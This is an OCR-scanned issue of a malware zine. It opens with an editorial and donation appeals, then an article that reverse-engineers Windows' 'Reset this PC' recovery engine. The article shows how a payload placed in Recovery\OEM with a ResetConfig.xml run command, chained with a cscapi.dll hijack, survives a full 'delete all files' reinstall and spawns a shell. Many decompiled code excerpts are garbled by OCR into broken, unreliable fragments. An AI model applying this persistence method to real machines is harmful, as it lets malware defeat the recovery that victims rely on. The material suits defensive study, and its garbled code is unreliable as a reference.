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Hello, how are you? 


Welcome to Black Mass Volume II. 


It has been nearly one year since we last spoke, time goes by fast doesn’t 
it? For those unfamiliar with Black Mass, this is a collection of works 
exclusive to the release of this zine. The ultimate goal of this series is 
to produce something interesting, and novel, or something which may 
encourage others to explore various malware techniques or concepts. 


Our first release was fun to develop. We had hundreds of wonderful people 
all across the planet give us feedback and share their thoughts and ideas 
following the release of the zine. We hope this issue also inspires 
people to explore malware and push the limitations of creativity. The only 
Limit to malware is the human imagination. 


This issue is particularly special though, beside it being our second 
release, this issue pays homage to first release which our publisher botched. 
To honor our many typos, mistakes, and failures, this book 
doubles as a coloring book. 


We hope you enjoy it. 


Thank you to everyone who has shown us love and support, has contributed 
to our zines, and continue to inspire and motivate us. 


We’1LlL speak again in Volume III. 


—smelly 


vx-underground is the largest publicly accessible 
repository for malware sourc ecode, samples, and 
papers on the internet. Our website does not use 
cookies, it does not have advertisements (omit 
sponsors) and it does not require any sort of 
registration. 


This is not cheap. This is not easy. This is a lot of 
hard work. 


So how can you help? We’re glad you asked. 


Become _a supporter! 


Becoming a supporter with monthly donations and get 
access to our super cool exclusive Discord server so 
you can make friends with other nerds and berate vxug 
staff directly. 


https: //donorbox. org/vxug-monthly 


Donate! 


Feel better about using vx-underground’s resources on 
an enterprise level while expecting enterprise level 
functionalities and service by throwing a couple bucks 
our way! 


https: //donorbox.org/support-—vx-underground 


Buy some of our cool shit! 


You’ Ll support actual human artists and have something 
bitchin’ to wear to cons. 
https: //www. vx-underwear.org// 


vx-underground only thrives thanks to the generosity 
of donors and supporters, and the many contributors of 
the greater research/infosec/malware communities. 


Thank you/uwu! 
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Why You Shouldn’t Trust the Default WinRE Local Reinstall 
Authored by LainPoster 


1.0: Introduction 


Hello everybody. In this entry | am going to talk about a very easy way to survive payloads across default WinRE 
reinstallations using the “delete all files” option of a home computer. This is so easy in fact anybody can do it 
without reversing anything, if you have looked enough around MSDN documentation. That would make this paper 
not worth writing, but | wanted to partially reverse the component that handled it, and this is the result of it (after 
some long periods of time staring at IDA...) | also want to point out that some parts were left out/optimized with 
significant modifications due to space. One example of these optimizations was done for ATL containers that had 
similar memory layout such as CStringT and CSimpleStringT, and here CStringT (specifically CStringW) will be 
used interchangeably for readability reasons. On the other hand, symbols that were excessively long in size were 
also optimized out. 


If you want to see some of my rebuilt structures/classes so you can continue reverse engineering other features of 
your interest, | will post a link with a SDK-like header file at the end of the entry that you can apply directly to IDA 
and you can modify on your will. 


1.1: Brief background information. 


WinRE is, in informal terms, a “small” Windows OS (a.k.a WinPE) which is stored in a WIM disk image file inside a 
partition which is meant to boot up from it when your core OS is malfunctioning. In terms of the WIM file used for 
storing it, there is native windows binaries for manipulating it such as DISM so coding one parser is not necessary 
for modifying or extracting the different executables as needed. For further technical details refer to the references 
section. 


Describing the entire internals of this environment (WinPE variant) is not the main objective of this paper. Instead 
we will focus on describing how the different recovery options are selected under the hood, and the most important 
interactions with the recovered OS that can lead to surviving reset (where you will see it is incredibly easy in the 
default configuration). 


However, the core question arises: How do you find the core binaries involved in this process? While the most 
reasonable approach would have been debugging, | decided to explore around the mounted WIM itself with the core 
files at first, looking for specific binaries that could be interesting, and googling them. This did not yield any results 
until | found the following image with an exception error: 


© Troubleshoot 


Reset this PC 
(Dv Lets you choose to keep or remove 
—= your files, and then reinstalls Windows. 
er Advanced options ’ 
Mv: 
v— P 
=a 


BestApp Window! RecEnviexe Application Error 


The instruction at 0x00007FF96BD92BA6 referenced memory at 
(0x0000047D 10A85798. The memory could not be read. 


Click on OK to terminate the program 


(boomer “screenshot”A) 


This error was particularly interesting because it gave away one specific binary after clicking the “Reset this PC” 
option: RecEnv.exe. Following it, | retrieved particular interesting modules involved, which were RecEnv.exe, 
sysreset.exe, and ResetEngine.dll, but these are just some of them which we will focus on throughout the entire 
entry. However, at first this looked just like a simple coincidence, so | had to test how valid these modules were for 
the recovery process. The easiest way to approach it was using the WinRE command prompt and create a process 
with some reversed argument parameters from the binaries recovered, specially sysreset.exe, which was the one 
that took my most attention. 


| have to say the results were very interesting, as you can see by some of the screenshots below, which matched 
with the type of result | was expecting and | was interested in. 


Reset this PC 


How would you like to reinstall Windows? 


If your connection is metered charges may apply. Cloud download can use more than 4 GB of data. 


Cloud download 


Download and reinstall Windows 


Local reinstall 


Reinstall Windows from this device 


© svchost xX: \windows\Syst j2\svchost. exe 
lb RecEnv X: \sources\recovery\RecEnv. exe 


® svchost X: \Windows\System32\svchost. exe 
884 ™ svchost X: \Windows\System32\svchost. exe 
864 ™ svchost X: \Windows\System32\svchost. exe 
844 © wWallpaperHost workerw X: \Windows\System32\wal lpaperHost. ex 
784 conhost MSCTFIME UI X: \windows\System32\conhost. exe 
772 ® winpeshl winpesh1. exe X: \Windows\System32\winpesh1. exe 
708 ™® svchost X: \Windows\System32\svchost. exe 
664 mm svchost X: \Windows\System32\svchost. exe 
604 i fontdrvhost X: \Windows\System32\fontdrvhost. exe 
596 ® fontdrvhost X: \Windows\System32\fontdrvhost. exe 
504 i Isass X: \Windows\System32\\1lsass. exe 
472 | winlogon X: \Windows\System32\winlogon. exe 


| want to point out an additional aspect that helped me out analyze statically the execution flow, and that | found 
later on: Log files. 


They contain a lot of the details of the execution environment that are stored at the end of the whole recovery 
process inside a folder named $SysReset, where each subdirectory has relevant information. In this sense, | only 
used mainly two file logs from this directory: Logs/setuperr.log and Logs/setupact.log. 


The main functions for logging to these files are Logging:: Trace or Logging::TraceErr.For this work, setupact.log 
was specially used for debugging some of my payload script issues and mapping different blocks of code that were 
executed, which aided me at getting a better big picture of the whole process. Initially | considered using hooks to 
log stack traces of particularly interesting binaries, but for most of the work shown here, any additional tooling was 
not needed. Without anything further to add, we can focus on describing better how some of the WinRE execution 
process details are staged and performed successfully. 


1.2.1. Reverse engineering WinRE binaries for execution scheduling internals. 


While at first | looked around binaries such as RecEnv.exe and sysreset.exe, | traced the execution of the modules 
statically in the following way: 
RecEnv.exe -> sysreset.exe -> ResetEngine.dil 


In this sense, the engine core execution process can be described from this point, particularly with ResetEngine.dll, 
and exports such as ResetExecute or ResetPrepareSession. The reason is the manipulation of an object named 
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Session, which members are of huge interest for further understanding how the engine prepares itself for executing 
the different options available. 


struct Session 

{ 

CAtlArray m_arrayProperties; 

BoolProperty m_ConstructCheck; 

BoolProperty m_ReadyCheck; 

WorkingDirs* m_WorkingDirs; 

BYTE bytes_not_relevant_members [64]; //not relevant for current context 
CString m_TargetDriveLetter; 

Options* m_Options; 

SystemInfox m_SystemInfo; 

DWORD m_IndexPhaseExecution; 

DWORD GapBytes; 

ExecStatex m_ExecState; 

OperationQueuex m_OperationQueueOfflineOps; //Offline operations 
OperationQueue+ m_OperationQueueOnlineOps; //Online operations 

BYTE bytes_not_relevant_members2[12]; //not relevant for current context 
}; 


The main reason for this is because this object contains a member of type OperationQueue, which is basically a 
typedef of CAtlArray for each DerivedOperation object to execute, tied to a particular derived Scenario type. Such 
scenarios are initialized thanks to ResetPrepareSession, and each of their operations related to it are executed 
properly with ResetExecute. 


struct __cppobj DerivedScenario : Scenario 
{ 

void* m_Telemetry; 

ScenarioType* m_ScenarioType;. 

void* m_CloudImgO0bjPtr; 


void* m_PayloadInfoPtr; 
Options* m_OptionsObjPtr; 
SystemInfox m_SystemInfoPtr; 
}; 


Describing the functionality inside ResetPrepareSession further, the method Session::Construct stands out by 
calling Scenario::Create and Scenario::Initialize. These methods will create a different derived Scenario object, 
where there is a maximum of 13 types, being the one that matters the most to us, ResetScenario. Additionally, the 
vtable from the base class is replaced with the one from the derived class type, effectively overriding it for 
functionality specifics of that case. Most derived scenarios have the same size, however, for the bare metal scenario 
cases, additional disk info information members are added. 


On the other hand, the Operation objects are queued to the OperationQueue thanks to the internal method per 
derived scenario type: InternalConstruct. It is important the results are applied for online and offline operations. 
This method is also in charge of initializing the ExecState object, which will see later on how it is relevant for our 
reverse engineering effort. 


dwResult = OperationQueue: :Create(OperationQueueOff line) ; 
if ( dwResult >= @ ){ 
dwResult = OperationQueue: :Create(OperationQueueOnLine) ; 
if dwResult >= 0 
vtableDerivedScenario = DerivedScenarioObj—>vTableScenario; //Overridden by derived type. 
dwResult = vtableDerivedScenario-—>InternalConstruct(DerivedScenario0bj, ExecStatePtr, 


OperationQueueOffline, OperationQueueOnline) ; 

if ( dwResult >= @ ){ 
xOperationQueueOfflineOperations = OperationQueueOffline; 
*0perationQueueOnlineOperations = OperationQueueOnline; 


t 
Ps 


Excerpt: Code snippet per Scenario to build OperationQueue objects inside Scenario::Construct. 


The InternalConstruct method redirects to an internal DoConstruct function. Inside of this function, 
Operation::Create, passes a CStringW which is highlighted by the code as the OperationTypelID member used 
as a key to an CAtiIMap<CStringW, struct OperationMetadata>. Specifically, once the specific type is found, the 
derived Operation is built calling OperationMetadata m_FactoryMethod member, which is basically a 
DerivedOperation constructor. 


struct OperationMetadata 
{ 
CString m_OperationTypeID; //1.-ATL wchar_t container for operation type ID. 
void* m_FactoryMethod; //2.—Main method for building derived Operation. 


OpNode = CAtlMap<CStringW, OperationMetadata>: :GetNode(m_OperationTypeIdArg, &iBinArg, &nHashArg, &prevNode) ; 

OpMetadataObj = &OpNode->m_value; //Finding node from input Operation ID name. 

FactoryMethod = OpMetadata0bj->m_FactoryMethod; 

DerivedOp0bjPtr = FactoryMethod(); //Calling factory method for derived Operation 
*DerivedOperationObjPtr = DerivedOp0bjPtr; 


Excerpt: Code snippet to build derived Operation objects inside Operation::Create, using Factory method. 


Additionally, just like with the Scenario class, the derived Operation object also replaces its base Operation vtable 
for executing specific functionalities to the operation (both cases are due to polymorphism). Below you can see the 
base Operation memory layout for each possible operation to be executed. 


struct Operation //Base operation class/struct. 

{ 
VtableOperation *VtableOperation; //Replaced by derived type (Polymorphism) 
CAtlArray m_ArrayProperties; 
CString m_OperationName; 


BoolProperty m_ExecutedProperty; 
Session*x m_SessionObjPtr; 
void* m_TelemetryObjPtr; 


Regarding ResetExecute, the internal function Session::ExecuteOffline redirects to Executer::Execute, which 
eventually leads to each queued derived operation’s InternalExecute method. 


PushButtonReset: :Logging::Trace(0, L"Operation validity check passed, will execute"); 
Derived0p0bj->m_Session0bj = Session0ObjCommands; 

DerivedOp0bj->m_TelemetryObjPtr = TelemetryObjPtr; 

dwResult = (Derived0p0bj—->VtableOperation->InternalExecute) (DerivedOp0bj, ExecStateObjPtr, ArgObject); 
Derived0p0bj->m_Session0Obj = 0164; 

DerivedOp0bj->m_TelemetryObjPtr = 0164; 


if( dwResult >= @ ) { 
DerivedOperation-—>m_ExecutedProperty.bCheck = 1; 
} elsef{ 
Logging::TraceErr(2i64, dwResult, "PushButtonReset: :Operation: :Execute", 
"base\\reset\\engine\\exec\\src\\operation.cpp", 580, L"Internal failure in subtype execution routine"); 


} 


Excerpt: Code snippet showing InternalExecute per derived Operation inside Executer::Execute. Notice how 
the members mainly passed as arguments to InternalExecute come from the base Operation type. 


While there are other functions that are also involved in this process besides the ones just mentioned, | consider it 
important to add only those which will also be a call to Operation::ApplyEffects after this code snippet. It basically 
executes the derived operation’s InternalApply method that may contain important initializations that will be used in 
the entire execution process, as it will be seen below. 


Staying on topic, there is a particular registry value that is used across the ResetEngine.dll binary, named 
TargetOS, which is set in HKLM\SOFTWARE\Microsoft\RecoveryEnvironment in the WinRE environment. Such 
registry value is extremely important because it will be used for the initialization of different members inside some 
of the most important classes used in the recovery process. One example of this can be found when we look at 
m_OldOSRoot, m_NewOsRoot and m_TargetVolumeRoot members, part of the ExecState class. What can be 
pointed out is this object is initialized through the DerivedScenario’s InternalConstruct method 

mentioned above, which can be seen as a parameter to the method in the code snippet. 


Talking more specifically about these members mentioned, it can be pointed out that m_OldOSRoot and 
m_TargetVolumeRoot are initialized using m_TargetVolume from the Derived Scenario object, which in turn 
comes from the Session object, which is initialized from this registry value as an argument to ResetCreateSession. 
However, at a certain point of execution all these members are set/used after the execution of one of the operations 
queued, specifically OpExecSetup, when the InternalApply method is called in the scheduled execution, as shown 
below. 


if (!ExecState->m_Have01ld0s.bCheck) 

{ 

ATL: :CStringW(&OldWindowsDir, L"Windows.old"); 

Path: :Combine(m_TargetVolumeRoot, &OldWindowsDir, &ExecState0bj—>m_Old0SRoot.CStringPath) ; 


1 
ExecState0bj-—>m_HaveNew0S.bCheck = 1; 
CStringW: :operator=(&ExecState—>m_New0SRoot.CStringPath, &m_TargetVolumeRoot) ; 


Excerpt: Setting up m_NewOsRoot and m_OldOsRoot after OpExecSetup InternalApply execution. 


This raises the question: Why is this Windows.old subdirectory specifically set up for the m_OldOsRoot 
member? This is mainly a consequence of the InternalExecute method of the same OpExecSetup operation, 
specifically using SetupPlatform.dll when the function CRelocateOS::DoExecute is called. We will not dive deep 
into the implementation of this aspect, since it’s not relevant enough for this paper. However, put briefly it migrates 
some of the different subdirectories and it’s files of the “Old OS” under “<DriveLetter>:\Windows.old\”, being this a 
temporary directory used for the recovery process itself. We will see exactly which migrated subdirectories from here 
are relevant to us in the next section. 


Now that we know everything is derived from this registry value, how is this registry value even set for the WinRE 
environment to interact with the OS volume? What | found out is that RecEnv.exe is in charge of this through 


CRecoveryEnvironment::ChooseOs. While tracing this function dynamically, the internal function 
CBootCfg::GetAssociatedOs can be highlighted. In this sense, what can be particularly pointed out from this 
method is the creation of a struct instance labeled as SRT_OS_INFO which populates it’s members inside 
CBootCfg::_PopulateOsInfoForObject. |f you just wonder why this matters: it’s first member is used for initializing 
this registry value. 


On the other hand, before calling _PopulateOsInfoForObject, there are interactions with the system BCD store 
from where the proper BCD object handle will be used to retrieve further data. From this point, a particular selection 
is done based on checks, which mainly focuses on matching GUIDs for finding the “Associated OS”, a.k.a our to-be 
recovered OS. This is mainly done inside CBootCfg::_IsAssociatedOs. After this particular check has been 
satisfied, The _PopulateOsInfoForObject method will eventually call CBootCfg::_GetWinDir, and from here, using 
BcdQueryObject, a _BCDE_DEVICE struct is used for retrieving the device object’s full name of the particular 
volume, using during my debugging sessions, the method CBootCfg::_GetPathFromBcdePath. This path will then 
be used with Utils::ForceDriveLetterForVolumeMountPoint to retrieve a proper drive letter to interact with the 
volume and then, using BcdGetElementDataWithFlags, a relative WinDir Path string (/Windows) is retrieved using 
another BCD object handle related to the GUID associated OS check, and then both are concatenated to form: 
<DriveLetter>:/Windows, which is the end result used for the TargetOS registry value. 


You might be asking “but isn't the engine itself using a drive letter, instead of this directory path?” To answer this 
we just have to keep in mind that at the moment when sysreset.exe calls ResetCreateSession, Path::GetDrive is 
used inside of GetTargetDrive to extract only the drive letter from the data set in the TargetOs registry value, working 
out the rest of the steps as described above. Another aspect that | have to point out is that everything described 
here has been explained exclusively from the WinRE environment execution flow perspective for ease, since there 
are different ways to set this “Reset this PC” option (but all of them have the same results for our payload). 


Now, we can ask the most important question after all the explanations done so far: “What additional details can 
be pointed out for abusing this specific scenario as needed?” For that, | have to show you more implementation 
details regarding the ResetScenario, which answer this question in much more detail. 


1.2.2: ResetScenario: reversing specific derived operation objects for surviving reset. 


Once we have described exactly how operations and each scenario are constructed by ResetEngine.dill, let’s focus 
on ResetScenario::InternalConstruct. In this sense, this method redirects to an internal function 
ResetScenario::DoConstruct, which will be adding the Operation struct using OperationQueue::Enqueue. For 
this scenario, only the offline operation queue is set and the overall list of all the operations being executed can be 
seen below. (Remember that online operations are not set in this case). 


Offline operation queue: 24 operations (CAtiArray) 
0: Clear storage reserve (OpClearStorageReserve) 
1: Delete OS uninstall image (OpDeleteUninstall). 
2: Set remediation strategy: roll back to old OS (OpSetRemediationStrategy). 
3: Set 'In-Progress' environment key (OpMarkInProgress). 
4: Back up WinRE information (OpSaveWinRE) 
5: Archive user data files (OQpArchiveUserData) 
6: Reconstruct Windows from packages (OpExecSetup) 
7: Save flighted build number to new OS (OpSaveFlight) 
8: Persist install type in new OS registry (OpSetInstallType) 
9: Notify OOBE not to prompt for a product key (OpSkipProductKeyPrompt) 
10: Migrate setting-related files and registry data (OpMigrateSettings) 
11: Migrate AppX Provisioned Apps (OpMigrateProvisionedApps) 
12: Migrate OEM PBR extensions (OpMigrateOEMExtensions) 
13: Set 'In-Progress' environment key (OpMarkinProgress) 
14: Restore boot manager settings (OpRestoreBootSettings) 
15: Restore WinRE information (OQpRestoreWinRE) 


16: Install WinRE on target OS (OpinstallWinRE) 

17: Execute OEM extensibility command (OpRunExtension) 

18: Show data wipe warning, then continue (OpSetRemediationStrategy). 

19: Delete user data files (OpDeleteUserData) 

20: Delete old OS files (OpDeleteOldOS). 

21: Delete Encryption Opt-Out marker in OS volume (OpDeleteEncryptionOptOut): 
22: Trigger WipeWarning remediation if a marker file is set (OpTriggerWipeWarning): 
23: Set remediation strategy: ignore and continue (OpSetRemediationStrategy) 


Now, we have to focus particularly on the specific operations that are more relevant to us, having in mind the 
execution order of the OperationQueue array that is being shown and our main objective, which is achieving any 
sort of filesystem persistence mechanism (surviving files and achieving code execution). The first thing | had to focus 
on while trying to survive in such an environment is finding where exceptions to deletion could be happening inside 
the construction of the Operation queue. Because of this, | considered initially operations such as 
OpDeleteUserData and OpArchiveUserData, since they seem relevant, but end up not being useful at all since 
they copy and delete the data they move, which is mainly $SysReset’s stored old OS folders and files. (The path 
would be <DriveLetter>:\$SysReset\OldOs) 


Because of this, | focused instead on operations related to migration, such as OpMigrateOEMExtensions. This 
derived Operation object basically inherits everything from BaseOperation and doesn’t have any additional relevant 
members, so what is most interesting from it is of course, OpMigrateOemExtensions::InternalExecute. 


At this point, we can say code speaks more than words, the optimized code snippet is shown below: 


Path: : Combine(&ExecState->m_O1ld0SRoot.CStringPath, L"R y", &0ldOsRecoveryPath) ; 
//Creating Recovery folder path with Old Os argument 

Path: : Combine(&ExecState—>m_New0SRoot.CStringPath, L' ry", SNewOsRecoveryPath) ; 
//Creating Recovery folder path with New Os argument. 

if (!Directory: : Exists (&New0sRecoveryPath) ) 

{ 

Logging: :Trace(@, L"Migra 


Path: :AddAttributes (&NewOsRecoveryPath) ; 


Directory: :CopySecurity(&0ldO0sRecoveryPath, S&NewOsRecoveryPath) ; 

} 

NewOsRoot = &ExecState—>m_New0SRoot.CStringPath; 

OldOsRoot = &ExecState-—>m_01d0SRoot.CStringPath; 

TargetVolRoot = &ExecState->m_TargetVolumeRoot.CStringPath; 
PbrMigrateOEMProvPackages(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving packages files. 
PbrMigrateOEMScripts(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving scripts, core target function. 
PbrMigrateOEMAutoApply(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving autoapply files. 


From all the functions that may be interesting, the one that interests me the most to cover is 
PbrMigrateOEMScripts. You might be asking why? It is pretty simple, this is the function that basically is in charge 
of moving files inside the <DriveLetter>:\Recovery\OEM folder from OldOs (Windows. Old folder), to the newOs 
(<DriveLetter>). 


Path: :Combine(m_OldOsRoot, L"Re« \\ , &0ldRecOemPath) ; 

Path::Combine(m_NewOsRoot, L" yery\\OEM", S&NewRecOemPath) ; 

Logging: :Trace(, L"M: OE 2 Sis g OE é [%s [%s]", OldRecOemPath. 
m_pchData, NewRecOemPath.m_pchData) ; 

if (Directory: :Exists(&0ldRecOemPath) && !Directory::Exists(&NewRecOemPath) 


(aun), 
Directory: :Move(&0ldRecOemPath, SNewRecOemPath, 1u); 


Excerpt: Optimized PbrMigrateOEMScripts snippet to move entire directory from old to new OS 
(with Directory::Move) 


Path: :GetDirectory(NewOsRecoveryOemPath, &ParentDirRecovery) ; 
if ( Directory: :Exists(&ParentDirRecovery) 


Path: :GetShortName(OldOsRecoveryOemPath, &ShortNameRecOemPath) ; 
Path: :GetCanonical(O0ldOsRecoveryOemPath, &CanonicalRecOemPathOld) ; 
Path: :GetCanonical(NewOsRecoveryOemPath, &CanonicalRecOemPathNew) ; 
dwFlags = !argFlag; 
if( MoveFileExwW(CanonicalRecOemPathOld, CanonicalRecOemPathNew, dwFlags) ) 
{ 


Oo ON OU HKWN 


if (ADJ(ShortNameRecOemPath.m_pchData)->nDataLength > 0) 
{ 
Path: :SetShortName(NewOsRecoveryOemPath, &ShortNameRecOemPath) ; 
} 


Excerpt: Optimized Directory::Move snippet related to moving subdirectories and files. 


This code effectively shows how the engine itself moves arbitrary files from the “OldOS” (Windows.Old) to the 
“NewOS” (<DriveLetter>), as long as they are inside this folder: Recovery\OEM. This however is not enough for 
achieving any sort of code execution to the target recovered OS, since we are limited to this directory for storage 
and there is no direct reliable interaction from which the recovered OS can use the migrated payload from this 
particular directory. 


This is where an additional Operation in the queue can be chained together for exactly this purpose: 
OpRunExtension. 


struct __cppobj OpRunExtension : Operation 


BoolProperty m_IsRequired; 
StringProperty m_PhaseExecution; 
PathProperty m_ExtensibilityDir; 
StringProperty m_CommandPath; 
StringProperty m_Arguments; 
IntProperty m_Duration; 

IntProperty m_Timeout; 

PathProperty m_RecoveryImageLocation; 
BoolProperty m_WipeDataCheck; 
BoolProperty m_PartitionDiskCheck; 


’ 


To show how exactly it matters to our intention, we have to look out for implementation details inside 


OpRunExtension::InternalExecute. Mainly there are functions that are in charge of setting the necessary 
environment, where we can point out mainly OpRunExtension::SetEnvironmentVariables and of course, 
OpRunExtension::RunCommanad. The latter is the most important function of this particular derived Operation in 
our context, but | will describe both. 


OpRunExtension: : ExecuteCompatWorkarounds (RunExtensionObj) ; 
dwCodeError = Path: :Combine(&ExecState0bj—>m_TargetVolumeRoot.CStringPath, , &TargetWinDir); 
if (dwCodeError >= @){ 

OpRunExtension: :SetEnvironmentVariables(RunExtensionObj, &TargetWinDir.m_pchData) ; 


OpRunExtension: :RunCommand(RunExtensionObj) ; 


Excerpt: Optimized OpRunExtension::InternalExecute understanding the overall execution flow. 


First, Op RunExtension::SetEnvironmentalVariables is not too important, but it’s core functionality is 
manipulating different registry values under HKLM\SOFTWARE\Microsoft\RecoveryEnvironment. Some of those 
values include Recoverylmage, AllVolumesFormatted, DiskRepartitioned and even TargetOs, but this is only 
created if it doesn’t exist, which is usually not the case as far as my tests have shown. On the other hand, 
OpRunExtension::RunCommand is much more interesting for our purposes. For this aspect, we have to explain 
particular things related to the OpRunExtension object. 


During the execution of ResetScenario’s DoConstruct/InternalConstruct methods, there are particular members 
that are initialized here, and most of them come from an object labeled as “Extensibility”. 


Extensibility: :HasCommandFor(ExtensibilityObjectPtr, 3u) //Reset End phase checks. 


Logging: :Trace(@, L" : C 
Extensibility: reatconaniilectensthitityou| anintee: 3u, SExtensibilityDi &ScriptPath, &Arguments, & 
dwSeconds) ; 

ArgsString = PayloadInfo: :GetImage(&Arguments) ; 

ScriptPath = PayloadInfo: :GetImage(&ScriptPath) ; 

OemFolderPath = eid acaaell earl ci rae ia aria tg 
Logging: :Trace(@, at: OEM e» n command defined in [%s] 

", OemFolderPath, ScriptPath, ArgsString, WORD) dwSeconds 

ATL: :CStringW(&OperationNameStr, L' ; 

Operation::Create(&OperationNameStr, OpRunExtensionObjPtr) ; 

BoolProperty: :operator= pas oprataiaer a ater ake >m_IsRequired, NF 

ATL: :CStringW(&m_PhaseExec, L"R 

PathProperty: joparatore (Scpaunescensign0o|etr >m_PhaseExecution, &m_PhaseExec) ; 
PathProperty: : operator=(&OpRunExtension0bjPtr—>m_ExtensibilityDir, S&ExtensibilityDir) ; 

PathProperty: :operator=(&0pRunExtension0bjPtr—>m_CommandPath, &ScriptPath) ; 

PathProperty: :operator=(&0pRunExtensionObjPtr—>m_Arguments, SArguments) ; 

IntProperty: :operator=(&0pRunExtension0bjPtr—>m_Duration, dwDurationSeconds) ; 

IntProperty: :operator=(&0pRunExtensionObjPtr—>m_Timeout, 3600); 

BoolProperty: : operator=(&0pRunExtension0bjPtr—>m_WipeDataCheck, 

BoolProperty: :operator=(&0pRunExtension0ObjPtr—>m_PartitionDiskCheck, 

OperationQueue: :Enqueue(OperationQueueOffline, OpRunExtensionObjPtr) ; 


Excerpt: Optimized ResetScenario::DoConstruct snippet to understand OpRunExtension member 
initialization. 


To explain how this Extensibility object is initialized, we need to focus on the proper method used for this precise 
purpose and the members of classes involved in it. The answer to this is simple, and it is basically inside 
ResetScenario::InternalConstruct, using the SystemInfo object with the member | labeled as 
m_TargetOEMResetConfigPath. This is basically the path to ResetConfig.xml, which has to be stored in the 


Recovery\OEM directory from the “OldOs”. 


StringInOemExtensibility=CStringW: :CloneData(ResetScenario0bj—>m_SystemInfoPtr-—> 
m_TargetOEMResetConfigPath.CString.m_pchData) ; 
if ( StringInOemExtensibility->nDataLength > 0 

Logging::Trace(@, L" ‘ a IH 


Extensibility: :Load(&StringInOemExtensibility, Extensibility0bj) ; 


Excerpt: Optimized ResetScenario::InternalConstruct snippet, which shows the usage of the Systeminfo 
member, used for referring to the ResetConfig.xml path inside Extensibility::Load. 


If we focus on this ResetConfig.xml file path and how it is used, we can say that reverse engineering the XML 
parsing itself is not particularly interesting, but in a brief description it can be said that this Extensibility object using 
the method Extensibility::ParseCommand with XmINode::GetAttribute and XmINode::GetChildText, checks for 
values that are documented here. Specifically, there is some parsed information regarding Run/Path XML elements 
that will be stored under the Extensibility object first member, which is of CAtiMap<enum RunPhase, struct 
RunCommand> type, particularly matching the enum RunPhase key and then modifying the proper 
RunCommand structure with the parsed information from the XMLNode object. 


If you wonder what all this means, it is just an overcomplicated way to say that we have to focus on three particular 
XML elements: RunPhase, Run and Path, at their proper execution phase to trigger some possible code 
execution. For our purpose, we only care for RunPhase == FactoryReset_AfterlmageApply, which is represented 
in the implementation as the enum PhaseEnd with DWORD value 0x3. 


However, while we know how to set up the environmental aspects of our payload so the WinRE engine works 
around it, we still don’t know how exactly the payload will be executed. To answer this, after explaining some of the 
workings around the setup for core objects related to OpRunExtension, we have to return again to the 
RunCommand method, which builds a command line string with arguments. 


PbrMountScriptDirectory (&this—>m_ExtensibilityDir.CStringPath, &ScriptDirectory); 
Logging: :Trace(@, L" é t %6S %s]", this—>m_ExtensibilityDir. 
CStringPath.m_pchData, ScriptDirectory.m_pchData) ; 
Path: :Combine(&ScriptDirectory, &this—>m_CommandPath.CStringMember, &ScriptFileCommand) ; 
ATL: :CStringW: :Format(&ScriptFileName, L"%s %s", ScriptFileCommand.m_pchData, this—>m_Arguments. 
CStringMember.m_pchData) ; 
Logging::Trace(@, L" Ex ) e [%s]", ScriptFileName.m_pchData) ; 


dwResultCode = Command: :Execute(&ScriptFileName, unused_arg, CommandObjPointer) ; 
if ( dwResultCode >= @ 
dwCodeResult = Command: :Wait(CommandObjPtr, this—>m_Timeout.m_int_for_property; ) ; 
if ( dwCodeResult < 0 ){ 

dwResultCode = @x800705B4; 

if ( dwCodeResult == @x800705B4 ){ 
Logging: :Trace e " " m meas 

Command: : Cancel (pCommandObj ) ; 


Logging: : Trace 


else{ 
Logging: :Trace(@, L" 
dwErrorCode = 0; 
dwResultCode = Command: :GetExitCode(CommandObj, &dwErrorCode) ; 
if (dwResultCode >= @){ 
if ( dwErrorCode 
Logging::Trace(@, L" i C su)", dwErrorCode) ; 


Excerpt: Optimized OpRunExtension::RunCommand for overall execution flow. 


If we inspect Command::Execute, the most important snippet of code that matters for our purposes is the following 
one: 


memset_@(&ProcessiInfo, @, sizeof(ProcessInfo) ); 

ProcessInfo.cb = 104; 

ProcessInfo.dwFlags = 256; 

ProcessInfo.hStdInput = Input; 

ProcessInfo.hStdOutput = commandObj; 

ProcessInfo.hStdError = commandObj; 

memset (&lpProcessInformation, ®, sizeof(lpProcessInformation) ); 
CreateProcessw , CommandLineOutput->m_pchData, : » 1, 0x8000000u, 
&ProcessInfo, &lpProcessInformation) ; 


This is where the brainstorming started: 


Since we have code execution within this environment and we know the operation scheduling order from static 
analysis, we can be sure that our stored payloads will be migrated from our “OldOs” to any “NewOs” OEM directory, 
thanks to OpMigrateOemExtensions and additionally, using a script file or a custom binary with particular 
arguments, we can also “arbitrarily” migrate from this “NewOS” OEM folder to a “NewOS” reliable directory from 
where we are sure we can trigger filesystem persistence, thanks to OpRunExtension and the TargetOS registry 
value that the environment itself provides us to interact with the to-be recovered OS volume. 


This idea is the first thing that of course seemed plausible when considering the execution done by the described 
operations of our interest, and maybe also looked way too easy in terms of application, but at the end of my tests, 
there were a lot of considerations that | had in mind at the end of experiments, which you will see in the next section. 


1.2.3: Practical limitations regarding the environment for payload’s usage. 


From this point onwards, everything described here is based on the results of the experiments | did for testing my 
payload, rather than reverse engineering specific binaries. In this sense, the OOBE phase is the next step which is 
in charge of creating the new user while using the newly modified OS volume, hence why every single change done 
through the recovery process is shown after the OOBE wizard has finished. However, due to the execution flow up 
until this point, it is implied that the new user specific folders can’t be accessed, since the payload migration had to 
be done before even starting this step. Taking in mind these logical assumptions, the statement that | can migrate 
my payload “arbitrarily” for code execution is not actually correct, since | can’t copy it to the new user’s specific 
target directories such as \Users\<NewUsername>\AppData\Roaming\Microsoft\Windows\Start Menu\ 
Programs\Startup. Similarly, it can be pointed out that there is also constraints related to restrictive DACLs for 
shared directories in a multiuser system such as ProgramData\Microsoft\Windows\Start Menu\Programs\ 
StartUp, which of course difficults from where we can trigger our payload from the recovered OS. 


So what is a simple solution to this problem with the mentioned constraints? The answer is an old fashioned dll 
hijacking payload, particularly one that was reliable (a binary that is guaranteed to be loaded after the reinstallation, 
inside the system root directory “<Drive Letter>:\Windows”.) Of course there are possibly other ways to achieve 
code execution by having access to this particular directory, but for this specific PoC, this was the main route that | 
took. Staying on topic, there are a lot of such DLLs that could be used for this precise purpose, but the one | 
decided to pick up as an example was cscapi.dll, used by explorer.exe. (Special thanks to Dodo for pointing me out 
to this dll). 


| specially crafted some simple dll that spawned a shell, some ResetConfig.xml and of course, the script to be 
executed which triggers the migration of the payload as well, all stored inside Recovery\OEM. Eventually all the 
process described in the sections above will be executed and we will get a command prompt after the OOBE phase 
